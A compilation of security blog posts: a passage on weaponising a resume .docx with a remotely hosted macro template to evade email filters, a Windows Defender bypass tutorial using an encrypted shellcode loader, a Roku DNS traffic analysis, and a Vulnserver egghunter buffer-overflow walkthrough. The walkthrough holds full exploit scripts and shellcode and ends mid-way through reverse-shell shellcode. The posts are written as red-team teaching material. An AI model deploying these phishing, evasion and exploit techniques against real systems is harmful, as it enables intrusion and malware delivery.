Zip the contents of the docx back up — Data to be Zipped

the zip successfully completed. — After Zipping

Rename the.zip to .docx — Change .zip to .docx

The resulting resume.docx will now attempt to pull down the example.dotm template from our Digital Ocean Space each and every time it is opened. The fun part is, we can change the permissions on the example.dotm URI to be Public or Private.

Dynamic Macro Enabling/Disabling

What makes this interesting is the fact that we can change access to the example.dotm file hosted on Digital Ocean simply by making the URI Private or Public.

Resume.docx does not crash when it attempts to navigate to the non-existent example.dotm URI, it just doesn’t load a macro because there’s not one there. Simply put, it looks like any standard docx should.

When we change the example.dotm URI back to Public, and re-open resume.docx, we are presented with a macro enabled document since the URI is alive.

Disable Docx Macro:

By “disable” I simple mean change access to the URI where the .dotm document is located. If the .docx can’t find it, then there’s no macro.

Setting the remote office macro to private — Example.dotm Set to Private

Template Document disabled, no macro is loaded. — Docx Opens Normally

Enable Docx Macro:

Setting the example.dotm to Public and re-opening resume.docx will give us a macro enabled docx that opens calc.exe when we click Enable Content.

Host the Office template on w VPS — Example.dotm Set to Public

Docx loading a macro from office template. — We Get The “Enable Content” Warning

Word Macro Executing Calc.exe — Enabling Content Opens Calc.exe

Use Case

At the top of this post I outlines four (4) of the positives when using this technique. The most objective one being bypassing Email filtering by sending a truly benign docx. Yes, you risk a user opening the document without detonating your macro if they’re really motivated to open everything in their email immediately. But hell, send the phish, wait 5-7min, and arm the link.

It’s also worth noting that an attacker can easily change payloads. For example, if for some reason your initial C2 has been burned but the infection point is undetermined, you can swap out the example.dotm with one of your backup C2’s.

Bypass Windows Defender with A Simple Shell Loader

Sevro Security

Joshua

25 May 2019 at 05:25

Sevro Security
Bypass Windows Defender with A Simple Shell Loader

One of the most simplistic ways to get past Windows Defender is to roll your own shell code loader. There are hundreds of examples on GitHub, GitLab, and BitBucket but, this post is going to break it down and provide a simple framework that Red Teams and Penetration Testers alike can use.

This tutorial does not result in a final “tool” although, it will have complete and compilable code. I know I know, C# is not compiled, it’s JIT, but for the sake a brevity, I’m calling it compiled.

Resources

Before jumping right in, here is a list of resources that will help answer questions and concerns you may have while reading this post (AKA: I won’t define/detail every aspect of the exploit and only highlight important and kick-ass things):

Simple-Loader Repository – The code I developed and that is displayed below.
C++/C# VirtualAlloc Function
Sharpsploit.dll – DLL of common and useful C# exploitation methods including shellcode injection (Useful when looking for code).
Hiding Metasploit Shellcode by Rapid7 – I’m not using any of the methods from this post but, this has a good write-up on how Defender/AMSI works and why your shellcode is being popped by Defender.

Current State

Here’s my system and build information for reference.

Exploit Information:

Language: C#
- .NET Framework 4.0 (Cross compile to whatever you like)
- Visual Studio 17 (community)
Build Architecture: x86
Shell Code: MSFVenom windows/exec
- msfvenom -a x86 -p windows/exec cmd=calc.exe -f csharp

Victim Information:

Windows 10 Version 1809
- Fully Patched and Updated (5/24/2019)
- Defender Real-Time and Online protection Enabled
- Firewall Enabled

All of Defenders services are turned on and updated

Testing

As of writing this (5/24/2019), Windows defender client Machine Learning system is able to easily detect stock Metasploit payloads. That’s not surprising. The question I asked myself was, to what extent do I need to go to to build a standalone binary that will execute a payload without the binary being flagged as malicious?

When I say to what extent, I am talking about coding techniques and byte code obfuscation. For example, would simply Base64 encoding a byte[] object work for us? The short answer is, No.

Initial testing consisted of generating a simple calc.exe execution payload where the shell code (C# byte Array) would be loaded and executed in memory using VirtualAlloc().

After building the x86 Release exe, moving the exe to the desktop, and executing it, Defender flagged it as malicious and promptly removed the executable from the system.

Looking at Event 1116 from above, it looks like Defender is flagging on the known formatting of Metasploit. Defender is saying this is a Win32 Meterpreter payload which, it’s not. Microsoft doesn’t care as long as it catches a known Metasploit byte signature. The good news is we might just be able to encode or encrypt the payload to bypass Defender.

The Bypass

Video of the actual bypass — Metasploit Shell_Reverse_TCP Example

It’s helpful to understand what we are trying to defeat. We know, initially, we are trying to defeat the Windows Defender Client Side Machine Learning (Client ML) subsystem and most 3rd party EDR and AV products. Things we want to avoid are massive Base64 strings because of their large entropy values. This will be immediately flagged by most EDR/AV products.

Other things we want to avoid are immediate shellcode execution for Windows Defender heuristic reasons. Defender and some EDR/AV products will be smart enough to remove sleep functions from your code so, depending on your Client/Target, this may or may not be an anti-forensics technique you utilize. My first thought was to have an base64 decoding and AES256 decryption routine to get the payload ready for execution. This would also delay execution by a few hundred milliseconds.

It turns out, that’s all that was needed. I have an Encrypt() and Decrypt() function in my code that utilizes AES 256. A user can encrypt and encode their data with the Simple-Loader tool to get the final shellcode encrypted blob in Base64 encoding.

Simple-Loader.exe <path_to_metasploit_payload_txt>

Generate your paylaod — Encrypt Payload Example

GitHub Repository

The repository is a quick and dirty one as this is just a simple example. However, here is a breakdown on how to use it:

Open the Simple-Loader.sln in Visual Studio
Double click Program.cs
Goto Build –> Build Simple-Loader
- A new Binary will be located in simple-loader/bin/

Build the loader — Build Simple-Loader.exe for Encryption

Generate a payload with msfvenom and save to text file.
- msfvenom -p windows/exec cmd=calc.exe -f csharp -o payload.txt
Encrypt and Encode the payload with the Simple-Loader.exe binary.
- Simple-Loader.exe <path_to_payload>

Encrypt the payload — Generate and Encrypt Payload

Take the output from Simple-Loader and replace the Sting hiphop with your new payload.

Add the encrypted payload — Change hiphop String

Re-Build the binary and you’re good to go!

Hopefully this helps shed some light on the simplicity of bypassing Windows Defender on a fully patched system!

Cheers!

Bypass Windows Defender with A Simple Shell Loader
Joshua

Roku & PiHole – A Deep Dive

Sevro Security

Joshua

7 December 2018 at 17:11

Sevro Security
Roku & PiHole – A Deep Dive

Update 1: (12/16/2018) – GitHub Repository Made Public Here.

Update 2: (12/16/2018) – Added a new analysis as /u/Anchor-shark within the /r/pihole subreddit mentioned I should take a look at a Roku that does not have the logging servers blocked. I have done just that.

This is a work in progress. It’s not perfect but it’s just starting to get cool and I’m digging deeper! I think this is going to be the first post in a series. I say that because I need to get my hands on some older hardware and there are some other gears moving as well. Anyhow, here’s the post.

A while back (years ago), I added a PiHole to my network. The thing is a damn workhorse! If you don’t know what PiHole is, well, you’re wrong and you should! Long story short, it’s a network-wide add blocker with a ton of features. But most importantly, it has lots of color and looks pretty.

Anyhow, I was recently looking over the data on my PiHole and noticed a serious amount of traffic coming from my Roku’s. Before I start getting into the specifics, let me first describe the systems on my network.

I own 3 different Roku’s. All of which are 1-2 years old which is important for a few different reasons.

They’re all running Roku OS v8+
Old features such as TCPdump are now unavailable.
Secret menus contain less functionality.

The Roku’s are all on a 192.168.1.x/24 network. This isn’t massively important but, it’s worth noting.

Roku Traffic Analysis

PiHole was showing that a large majority of all the traffic on my home LAN was coming from my three Roku devices. This isn’t too surprising since they’re streaming devices and at any given time one or two of them are active (wife, kids, etc.).

I still decided to investigate and take a deeper look into the data to see what the Roku’s were actually doing. First, let’s just take a look at the data within the PiHole Web UI.

The traffic displayed int eh images above are DNS queries that has been blocked and queries that have nothing to do with my streaming services (i.e., Netflix, Amazon, etc.). But still, those are only the blocked domains that are being seen so, a deeper look was necessary.

The next logical thing to do is to pull the logs from the server and start to parse them. The problem is PiHole rotates the logs every 5 days. So before you can jump right in, you need to change the logrotate configuration. I changed mine to rotate every 100 days. Full disclosure, the data that I will present here is from a 14 day analysis. I don’t expect a massive difference but, I thought I would put it out there.

I waited 24 days, pulled the logs, and wrote some python to strip the logs for the data I wanted. My initial criteria to narrow the logs down to a manageable size was:

Only log entries with the DNS request coming from the Roku IP’s.
Only the Date, IP, URI attributes shall be parsed.

The logs themselves are not in the best form so, first things first, translate the data I want to a CSV and store to disk for later parsing. Also, this makes it SOO much easier to ingest the data into a pandas dataframe for analysis.

Once the logs are in CSV and in a dataframe object, we can them parse out the following:

Log entries that have a Roku logging servers listed as the URI.
Log entries for logging servers on a per IP basis for individual analysis.

This left me with several csv’s:

all_logs.csv – Contains all logs parsed from the 14 log files from the Roku IP’s.
roku_logs.csv – All log entries that are *.logs.roku.com
<ip>.csv – Three logs segregated by IP subject to the roku_logs.csv

My main goal with this initial analysis is to determine how much traffic compared to all traffic do the Roku’s generate on my network and how much of that traffic was Roku logging traffic (i.e., not streaming traffic). The last thing is a differential time analysis. That is, how often are the Roku’s beaconing out to the logging servers.

Analysis Results

When you initially look at the logs, it seems that most of the Roku’s beacon out every 30 seconds to their logging servers. Sometimes, well most times, it’s multiple beacons every 30 seconds to different servers. Here’s an example:

24 Days of aggregated data

Roku overall traffic made up 34% of all traffic on my LAN
Roku direct logging traffic made up 14% of all traffic on my LAN
192.168.1.58:
- Total Number of Logging Records: 115,594
- Beacons on average every 18.69 seconds over 24 days
192.168.1.99:
- Total Number of Logging Records: 129,408
- Beacons on average every 16.69 seconds over 24 days
192.168.1.209:
- Total Number of Logging Records: 149,977
- Beacons on average every 14.40 seconds over 24 days

So what does this mean? Well, it means that on average, a Roku is logging information about you and your family about 380 (2-4 sDNS requests per 30-40 sec) times per hour and 8,800 times per day, give or take a few hundred.

Okay Okay but, what are they logging? Well, I started to attack this problem and the first logical step is to look at the Roku’s privacy policy. So, let’s take a look.

Update 1: Roku Logging Allowed

Since this project came from my PiHole logs, I thought I would get some internet constructive criticism from the /r/pihole subreddit. You can view the thread here. One of the redditors made a really good point that basically stated that the Roku’s are effectively freaking out because their DNS requests are getting blocked. As such, the frequency is subject to the blocking and not the true nature of an active Roku whos DNS requests are not getting blocked.

This is a really good point as this very well might be the case. So, for the last 4 days, I have allowed all Roku logging traffic on my LAN. The PiHole logs still capture the DNS requests and therefore, the logs still maintain a valid record of unblocked requests.

Before we look at the data, I want to be as transparent as possible. I have made some adjustments on my timing function. Whereas I was originally looking at only unique timestamps per IP and then obtaining the time differential of the datetime objects via pairs, I am now simply taking the number of records (DNS Requests) and dividing them by the total number of seconds. The total number of seconds is determined by taking the last record in the DELTA_DATES array (i.e. DELTA_DATES[len(DELTA_DATES)-1]), which is a DateTime object, and subtracting it by the most recent date (i.e., DELTA_DATES[0]). I felt that not only is this much simpler but, it’s more representative as I am no longer just measuring unique records. I have edited the initial results to reflect the new changes.

The Data

For the last 4 days, here is the information:

Roku Overall Traffic Made up 47% of all traffic on my LAN.
Roku Direct Logging Traffic made up 9% of all traffic on my LAN
192.168.1.58:
- Total Number of Logging Records: 17,694
- Average Beaconing Time Interval: 18.19s
192.168.1.99:
- Total Number of Logging Records: 3,541
- Average Beaconing Time Interval: 90.72s
192.168.1.209:
- Total Number of Logging Records: 6,439
- Average Beaconing Time Interval: 49.87s

This is very interesting to me. The Roku that gets the most use by far is the living room (192.168.1.58) because it’s connected to our large 4K TV and is at the center of everything in our home. This guy is in use pretty much all day when we are at home (i.e., Music, Netflix, Sling, etc.). So it would seem that the more the system is being used, the more it is going to beacon out. It’s also worth noting that the other two Roku’s are not used as much. Especially the basement system as that’s really only used during parties.

If we look specifically at the Living Room Roku and breakdown all traffic over the 4 days by hour, we can easily see that right away in the mornings (breakfast, news) the logging spikes and gradually goes up and down over midday and night suggesting that Roku logs a ton more ( every 18.19 seconds) if that system is in use.

The data seems to support Reddit’s point that Roku’s will phone home more if they’re being blocked, however if you are using those Roku’s frequently, it’s a moot point as it seems they log just as much if not more.

Let’s put my assertion to the test. The Living Room analysis above supports my assumption so, if we look at the Master Bedroom, where the Roku gets used before going to bed, we should see a spike around that time. And we do.

I think the big takeaways are:

The system log activity is directly correlated to use. This is probably objective for everyone.
Mild/Medium use of a Roku system generates just as much traffic as blocking DNS requests coming from Roku. We see a minor change in overall traffic from the Living Room host when we allowed all logging (0.5% difference).
For systems not is regular use, the DNS logging traffic decreases by 50-70 seconds per beacon if traffic is allowed supporting Reddits point that blocking traffic is, therefore, causing more traffic. Again, if you use a system frequently, it will generate just as much traffic if you were to block the DNS requests.

What’s Roku Logging?

I’ll list a few of the things but first, here is the Roku Privacy Policy.

Name
Email Address
Postal Address
Phone Number
Birth Date
Demographic
Social Media Accounts
- OAuth login information
Shipping Information
Purchase information
- Web Cookies
- Roku App Purchases
- Gift purchases
Credit Card Information
Personal Information on friends/connections:
- email
- address
- gifts
IP address
Operating System type
Operating System Version
WiFi network name
WiFi networking connection metrics
Web Cookie Data

The list goes on and on and on. But reading a privacy policy just isn’t sexy. So, I’ve pulled a few PCAP’s from my router which, didn’t amount to much other than mapping the AWS buckets.

My next attempt to pull data from the logging PCAP’s was to DNS and ARP cache poison one of the Roku’s while running an HTTPS proxy and a self-signed certificate. This just ended up in a CA authenticity failure which, was to be expected. Maybe SSLStrip could work? Not sure yet but, this might not be the right path.

Future Research

Here is what I am currently working on in attempts to get more information all together.

Roku’s used to have a TCPDump utility when you enabled developer mode. All of my devices have been connected and have auto-update on. There’s also no way to revert the box to an older OS. However, I think I have a good lead on a system that has not been connected for a few years and might be interesting.

Roku’s developer API and Brightscript:

Roku uses their own programming language called brightscript. The API is pretty well documented and it’s very simple to enable developer mode via secret menus and start pulling XML information from the system. The issue is there is no direct contact to the underlying OS (Which is Linux) with the exception of a telnet shell with access to the free command. And trust me, I’ve tried all sorts of command injection with that!

Within the Roku Developer documentation though it does talk about the way brightscript applications are sand-boxed and have limited access to system functions. The brightscript might be a dead end but, it’s worth a shot so I will build a few basic apps and see what information I can get from the system or the effetive application hypervisor.

Another interesting part of the Roku External API is the capability to send remote commands to the system via HTTP GET requests. By remote commands I mean the literal Roku Remote (Home, Netflix, Back, Up, etc.). This is interesting because it means that it may be possible to enable developer mode and manipulate settings without physical access to the system. So, if there was a possible exploit vector via a Brightscript application, that path to exploitation could hypothetically be automated.

Roku & PiHole – A Deep Dive
Joshua

Vulnserver KSTET Egg Hunter with Python3

Sevro Security

Joshua

22 November 2018 at 04:37

Sevro Security
Vulnserver KSTET Egg Hunter with Python3

During my OSCP study, I went down the Buffer Overflow rabbit hole and found myself going a bit further than needed. I found out I really freaking like binary exploitation! Today, I am going to talk about Egg Hunters. Egg Hunters are used when we don’t have enough room after the EIP overwrite to execute anything worth our time (i.e., a shell, system command, etc.). An Egg Hunter is a small set of bytecode that is effectively a loop looking for a pre-defined string (that we define) in memory and when it finds that string, it will execute whatever is after. The code after our pre-defined string being our exploitation bytecode.

To put this into context, let’s say we have two FTP parameters that store data on the stack (USER, PASS). Let’s say that the PASS parameter is susceptible to a BOF attack and we can easily gain control of EIP. However, we only have maybe 20-30 bytes after the EIP overwrite to store any bytecode and that’s just not enough space to do anything useful. In comes the USER parameter. It’s not susceptible to a Buffer Overflow necessarily however, it might give us enough buffer space to store our shellcode. In this case, we would have a two-stage execution where we conduct the following:

Connect to the FTP server.
Send our Reverse Shell Payload in the USER parameter.
Send our Egghunter plus the EIP Overwrite to JMP ESP in the PASS Parameter.

Okay, let’s dig in.

[hr]

Setup:

Here is the setup that is being used during the entire write-up:

[Attacker] Kali 2018.4 x86_64
[Victim] Windows XP SP3 Build 2600
[Vulnerable Binary] VulnServer
[Language] Python 3.6.6
[Debugger] Immunity
- We will also use the Mona Script with Immunity.

Some of you might be asking why Python 3? That’s fair since the python 3 socket library is different than the 2.7 library and that’s really why I am using it, to learn. The biggest difference you will note is that when you send your data to the server, it has to be in a byte object and not a string object whereas 2.7 doesn’t give a shit.

[hr]

Fuzzing:

Our first goal is to identify which parameters are vulnerable but since VulnServer has a few, we’re going to start with the KSTET Parameter. In order to get a better idea on how many parameters there are, below is the available listing.

VulnServer Parameters

We send 1,000 A’s (\x41) with the KSTET parameter and we see we overflow the buffer.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*1000

s.send(b"KSTET %s \r\n" % buf)

s.close()

[hr]

Controlling EIP:

Just like we do with any BOF, let’s get the offset of EIP so we can start the process of controlling EIP.

pattern_create.rb -l 1000

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
pattern = (b'''Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B''')

buf = b""
buf += pattern

s.send(b"KSTET %s \r\n" % buf)

s.close()

We then verify the Immunity EIP value.

EIP Offset

And use the pattern_offset to file the true offset of EIP:

pattern_offset.rb -q 63413363
- Offset = 70

Now, let’s send a new payload to do two different things. The first goal is to verify we do have control of EIP by writing all B’s into EIP and the next goal is to check how much space we have after the EIP overwrite to place our shellcode. We do this by sending 600 C’s. The new code looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*EIP_OFFSET
buf += b"B"*4
buf += b"C"*600

s.send(b"KSTET %s \r\n" % buf)

s.close()

Immunity shows that yes, we have control of EIP as there are now 4 B’s (\x42) residing in the EIP register, however, we only have 28 Bytes of space after the EIP overwrite. As stated in the beginning of this tutorial, that’s just not enough, we need more space.

EIP Verify

Overflow Space

[hr]

Determine Bad Characters:

Before we start digging into other parameters we can place our shellcode into, let’s determine the bad characters. Here is our new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Bad Characters:
bad_chars = [0x00,0x0a]
chars = b""
for i in range(0x00,0xFF+1):
    if i not in bad_chars:
        chars += bytes([i])
with open("bad_chars.bin", "wb") as f:
    f.write(chars)

# Send data to the KSTET Parameter:
buf = b""
buf += chars
s.send(b"KSTET %s \r\n" % buf)

s.close()

In looking at the bad characters, it’s apparent that we don’t have enough space to review the whole array of bytes. As such, I conducted the overflow in three separate operations:

Operation 1: 0x00 – 0x60
Operation 2: 0x60 – 0xC0
Operation 3: 0xC0 – 0xFF

Bad Characters were determined to be: 0x00, 0x0A, 0x0D

[hr]

Finding JMP ESP:

Since I am using VISTA as the victim, there will be little to no protection (DEP,ASLR). That means we can just ask mona to look for the JMP ESP opcode (\xFF\xE4) and choose any of the results.

JMP ESP

I’m just going to use the first result (0x7C874F13). To make sure we have full control and are able to execute the JMP ESP instruction, let’s restart the vulnserver in Immunity and set a break point at the address. Here is the new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A" * EIP_OFFSET
buf += JMP_ESP
s.send(b"KSTET %s \r\n" % buf)

s.close()

And we have a successful JMP ESP.

Breakpoint Hit

[hr]

Building the Egghunter:

Okay, we know that we only have about 28 Bytes after the EIP overflow to work with. That wont fit our egghunter byte code. In that case, we will inject our egghunter before the EIP overwrite and then add the instruction JMP SHORT -48 after the EIP overwrite to jump back to our egghunter. What we need to figure out now is which parameter can successfully take an input of about 350-450 bytes of data and not throw an exception or overflow the buffer. Let’s build a fuzzing script to do that for us.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"GTER",b"HTER",b"LTER",b"KSTAN"]

for i in range(0,len(parameters)):
    print("[+] Sending %s"% str(parameters[i]))
    buf = b""
    buf += parameters[i]
    buf += b" "
    buf += b"A" * 500
    s.send(b"%s\r\n" % buf)
    time.sleep(1)

Right away, we find that the GTER parameter causes an overflow. Let’s remove that and test again. After the second test, we see that the rest of the parameters ran successfully without causing an overflow or an exception. This means that maybe, we can store our shellcode in one of these parameters and have the egghunter find it in memory. Now that we know the parameters, let’s add this to our script and build a two payload program.

To generate the egghunter code, we will use mona.

!mona egg -cpb "\x00\x0a\x0d" -t loki

Generate Egghunter

The image above shows our shellcode. The generated shellcode will also be listed in an egghunter.txt document located at C:/Program Files/Immunity Inc/Immunity Debugger.

Now let’s generate some shellcode. For testing, I am just going to send the command calc.exe. The syntax to generate this shellcode is:

msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d' -f c

Our new script looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

shellcode = (b"\xda\xce\xba\x5b\x24\x91\xbf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xef\xfc\x31\x57\x14\x03\x57\x4f\xc6\x64\x43\x87\x84"
"\x87\xbc\x57\xe9\x0e\x59\x66\x29\x74\x29\xd8\x99\xfe\x7f\xd4"
"\x52\x52\x94\x6f\x16\x7b\x9b\xd8\x9d\x5d\x92\xd9\x8e\x9e\xb5"
"\x59\xcd\xf2\x15\x60\x1e\x07\x57\xa5\x43\xea\x05\x7e\x0f\x59"
"\xba\x0b\x45\x62\x31\x47\x4b\xe2\xa6\x1f\x6a\xc3\x78\x14\x35"
"\xc3\x7b\xf9\x4d\x4a\x64\x1e\x6b\x04\x1f\xd4\x07\x97\xc9\x25"
"\xe7\x34\x34\x8a\x1a\x44\x70\x2c\xc5\x33\x88\x4f\x78\x44\x4f"
"\x32\xa6\xc1\x54\x94\x2d\x71\xb1\x25\xe1\xe4\x32\x29\x4e\x62"
"\x1c\x2d\x51\xa7\x16\x49\xda\x46\xf9\xd8\x98\x6c\xdd\x81\x7b"
"\x0c\x44\x6f\x2d\x31\x96\xd0\x92\x97\xdc\xfc\xc7\xa5\xbe\x6a"
"\x19\x3b\xc5\xd8\x19\x43\xc6\x4c\x72\x72\x4d\x03\x05\x8b\x84"
"\x60\xf9\xc1\x85\xc0\x92\x8f\x5f\x51\xff\x2f\x8a\x95\x06\xac"
"\x3f\x65\xfd\xac\x35\x60\xb9\x6a\xa5\x18\xd2\x1e\xc9\x8f\xd3"
"\x0a\xaa\x4e\x40\xd6\x03\xf5\xe0\x7d\x5c")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # Jump Back 50 Bytes for egghunter shellcode
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

The script is broken down into two different stages. Each stage generates a new socket call to the vulnerable server, this is important. Also, take note to the Stage 1 s.send(). You can see I have added the b"lokiloki" to it. This is the string that the egghunter is going to look for in memory. When you generate the egg hunter with mona and read the .txt file it generates, it will explicitly tell you what text to put there. Let’s break down what is happening at each stage.

Stage 1:

In stage one, we connect to the vulnerable server and start a for loop. The for loop loops through the parameters array using each value to send the shellcode payload. We don’t know which parameter will truly hold our shellcode so hell, why not try them all! And that’s effectively what we are doing here. It’s also important to note that a 1-second time delay is necessary at the end of each loop iteration. Without that one second time delay, we outpace the server and never give it a chance to take action on the command we just sent.

Stage 2:

Stage two is where the real magic happens. We create a new socket and connect to the vulnerable server once again. This time, we send the egghunter between two sets of NOP’s, overwrite the EIP register with our JMP ESP instruction memory address, and then we have a custom instruction we wrote (\xEB\xCE) that’s loaded into the stack per our overflow and executed after the JMP ESP instruction. Let’s take a look at this instruction and why we have it in our payload.

Our egghunter shellcode is still a bit too big to be loaded after the JMP ESP. However, we know we have a total of 70 bytes before the EIP overwrite and therefore we can use that space to store our egghunter and then jump back to it with a custom instruction. In this case, I want to jump back 48 Bytes to the middle of our first NOP sled. We can use the nasm_shell.rb to give us the correct opcode to use as seen in the image below.

NASM

Let’s put a breakpoint in Immunity at our JMP ESP and step through what is going on here.

JMP SHORT -48

When we hit our breakpoint we jumped forward 1 instruction (F7) to get to our JMP SHORT instruction highlighted in blue in the leftmost image. When we move forward again (1 instruction) we see we jump to a lower memory address putting us 4 NOP Bytes before our egghunter. Perfect!

The egghunter is going to start a loop looking for the lokiloki string in memory in an attempt to find our shellcode and execute it. If we let the rest of the code run it’s course, we get calc.exe to pop and we know we have full code execution!

calc.exe

[hr]

Reverse Shell:

Now that we have a fully working exploit, let’s resplace the calc.exe shellcode with a reverse shell and see what happens.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.136 LPORT=443 -b'\x00\x0a\x0d' -f c

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

shellcode = (b"\xda\xc7\xd9\x74\x24\xf4\xb8\xca\x84\x12\x1c\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x83\xc2\x04\x03\x88\x97\xf0\xe9\xf0\x70\x76"
"\x11\x08\x81\x17\x9b\xed\xb0\x17\xff\x66\xe2\xa7\x8b\x2a\x0f"
"\x43\xd9\xde\x84\x21\xf6\xd1\x2d\x8f\x20\xdc\xae\xbc\x11\x7f"
"\x2d\xbf\x45\x5f\x0c\x70\x98\x9e\x49\x6d\x51\xf2\x02\xf9\xc4"
"\xe2\x27\xb7\xd4\x89\x74\x59\x5d\x6e\xcc\x58\x4c\x21\x46\x03"
"\x4e\xc0\x8b\x3f\xc7\xda\xc8\x7a\x91\x51\x3a\xf0\x20\xb3\x72"
"\xf9\x8f\xfa\xba\x08\xd1\x3b\x7c\xf3\xa4\x35\x7e\x8e\xbe\x82"
"\xfc\x54\x4a\x10\xa6\x1f\xec\xfc\x56\xf3\x6b\x77\x54\xb8\xf8"
"\xdf\x79\x3f\x2c\x54\x85\xb4\xd3\xba\x0f\x8e\xf7\x1e\x4b\x54"
"\x99\x07\x31\x3b\xa6\x57\x9a\xe4\x02\x1c\x37\xf0\x3e\x7f\x50"
"\x35\x73\x7f\xa0\x51\x04\x0c\x92\xfe\xbe\x9a\x9e\x77\x19\x5d"
